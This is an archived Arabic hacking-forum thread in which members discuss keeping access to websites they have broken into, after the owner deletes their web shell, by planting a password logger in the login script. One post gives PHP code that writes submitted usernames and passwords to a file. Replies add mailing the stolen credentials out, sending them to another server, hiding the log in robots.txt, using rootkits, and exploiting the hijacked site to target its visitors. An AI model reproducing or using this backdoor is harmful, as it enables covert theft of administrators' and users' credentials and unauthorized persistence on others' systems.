المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [نقاش ] زرع key-logger في ملفات تسجيل الدخول


pmoki
18-12-2012, 07:05 PM
السلام عليكم و رحمة الله و تعالى و بركاته
أهلا بكم أعضاء و زوار منتدى الحماية للأبد :cool:

الحمد الله وحد نحمده ونشكره ونستعين به ونستغفره ونعود بالله من شرور أنفسنا ومن سيئات أعمالنا من يهدي الله فلا مضل له ومن يضلل فلا هادية له أشهد ان لا إلاه الى الله وحده لا شريك له وأشهد أن محمدا عبده ورسوله صلى الله عليه وسلم وعلى آله وصحبه أجمعين ومن تبعهم بالإحسان الى يوم الدين ربنا لا علم لنا إلا ما عمتنا إنك أنت العليم الخبير ربنا لا فهم لنا إلى ما أفهمتنا إنك أنت الجواد الكريــم ربي اشرح لي صدري ويسر لي أمري واحلل لي عقدة لساني يفقهوا قولي

أما بعد

هناك الكثير من الأمور التي تطرأ ببالي
و لعل أكثر شغلي هو معرفة أصحاب المواقع بعض الأمور الخاصة بالهكر و لعل أكثرها الشل

قد يختررق أحدنا بعض المواقع لكن ما يدور يوم كامل حتى يعرف صاحب الموقع بأمر الشل و يقوم بحذفه و قد يصل الى حد ترقيع الثغرة التي رفعنا منها الشل
و يضيع كل جهدك خاصة اذ كنت سهرت الليالي معه
و الآن و بعدما حذف صاحب الموقع الشل و غير الكلمة السرية و و و و و

لكن هنا يبقى بصيص أمل
و هو أن تقوم بعملية زرع لـ key logger
و هي طريقة سهلة جدا للقيام بهاته الخطوة
و الآن قد يكون فعلا حذف الشل
لكن تبقى دائما على اطلاع بكلمته السرية مهما فعل لكن يجبمعرفة كيفية التعامل مع هذه الطريقة و عن رأي أرى أنه يحبذ استخدام ملفات من السكربت لتسجيل المعلومات و طبعا ملفات يمكن الوصول اليها

الى هنا أتمنى أن تكون وصلت الفكرة
فإن أصبت فمن الله و ان أخطأت فمني و من الشيطان

اليكم لوحة المفاتيح لاثراء النقاش :p

و السلام عليكم و رحمة الله و تعالى و بركاته

n4ss1m
18-12-2012, 07:16 PM
أهلا pmoki هذي غيبة
backdoors من بكري كاين بصح لم أفهم قصدك
لواش حاب توصل بهذا نقاش كيفية زرع كي لوجر ولا تقنيات تلغيم ولا واش
يعني أفتحلنا الباب باش ناقشوا

dzkabyle
18-12-2012, 08:10 PM
السلام عليكم
اضن انك تعني تلغيم صفحة تسجيل الدخول
و يتم ارسال الباس كلما قام بسجيل الدخول

pmoki
18-12-2012, 09:09 PM
أهلا نسيم خويا
و الله يا حبيبي توحشناكم و توحشنا المنتدى
الله غالب راك عارف القراية
-----------
طبعا حبيت نقولك في ملف تسجيل الدخول أو بالأحرى في ملف الخاص بمعالجة الاسم و الكلمة السرية و غالبا ما يكون dologin.php
تحقن الكود الخاص بك و الذي يقوم بتسجيل المستخدم و الكلمة السرية و حفظها مثلا في ملف
و للتوضيح أكثر
هذا مثال

$logins = $_POST['log'];
$pwds = $_POST['pwd'];
$fp = fopen('data.txt', 'a+');
fwrite($fp, 'Login:'.$logins.' | Password:'.$pwds.'\n\d');
fclose($fp);


------------------------
dzkabyle (http://www.sec4ever.com/home/member.php?u=5984)

نعم شئ من ذلك القبيل الا أن الكلمة السريية يتم تيجيلها في ملف على الاستظافة

dzkabyle
18-12-2012, 09:31 PM
يجب ان تستعمل الطريقة التي ذكرتها مع استعمال الدالة mail
في حالة تم حذف الملف data.txt
ستصل المعلومات عبرى الايميل.

+

هناك طريقة لم اجربها بعد عبرى ال ajax
نفس المبداء لكن يتم حفظ البيانات في سرفر اخر

pmoki
18-12-2012, 09:47 PM
يجب ان تستعمل الطريقة التي ذكرتها مع استعمال الدالة mail
في حالة تم حذف الملف data.txt
ستصل المعلومات عبرى الايميل.

+

هناك طريقة لم اجربها بعد عبرى ال ajax
نفس المبداء لكن يتم حفظ البيانات في سرفر اخر

نعم بالطبع لكن أنا أعطيتك مثال فقط
مثلا يمكن استخدام ملف robot.txt لتخزين المعلومة و لن يشك فيه أبد

---------------

الأجاكس لا أظن أنها ستنفع لأنك تحتاج الاتصال بسرفر و وو و و و و و
تأخذ الوقت أكثر مما ينبغي

dzkabyle
18-12-2012, 10:28 PM
---------------

الأجاكس لا أظن أنها ستنفع لأنك تحتاج الاتصال بسرفر و وو و و و و و
تأخذ الوقت أكثر مما ينبغي
---------------

ساجرب عندما يتسع لي الوقت و ارى

Li0n-PaL
19-12-2012, 09:53 AM
في طرق كثير لزرع الkey-logger وكل سيرفر وإله طريقته الخاصة

GB47
01-05-2013, 12:58 PM
ممكن أي واحد يشرح لنا كيفية زرع الكيلوجر أو تلغيم صفحة الدخول
كل ما يحاول الأدمن تسجيل الدخول يرسل الباس للإيميل

للأسف مبتدأ في الــ php

KAMINDOZ
01-05-2013, 01:29 PM
كل سكربت له كيلوجر خاص به مثلا vb و whmc و wordpress
اما هنالك طرق اذا كان عندك روت تقدر تستخدم روت كت لبقائك على السيرفر


اختراق المواقع من قبل المحترف ليس hacked by وانما استغلال موارد الموقع والوصول الى افضل النتائج

مرات تقدر تستفاد من الموقع في استهداف اشخاص اخرين

من خلال دعوتهم للاشتراك في هذا الموقع

كل الطرق تحتاج الى اتقان الهندسة الاجتماعية

SoUiLaHxXx_Dz
01-05-2013, 06:24 PM
وعليكم السلام ورحمة الله تعالى وبركاته
نقاش جميل ومفيد
اما بخصوص تلغيم السكربتات فقد وضع الاخ DamaneDz
شرح جميل جدا لتلغيم السكربتات المشهورة
من هنا :) (http://www.sec4ever.com/home/showthread.php?t=11732&highlight=%CA%E1%DB%ED%E3+%C7%E1%D3%DF%D1%C8%CA%C7 %CA+%C7%E1%E3%D4%E5%E6%D1%C9)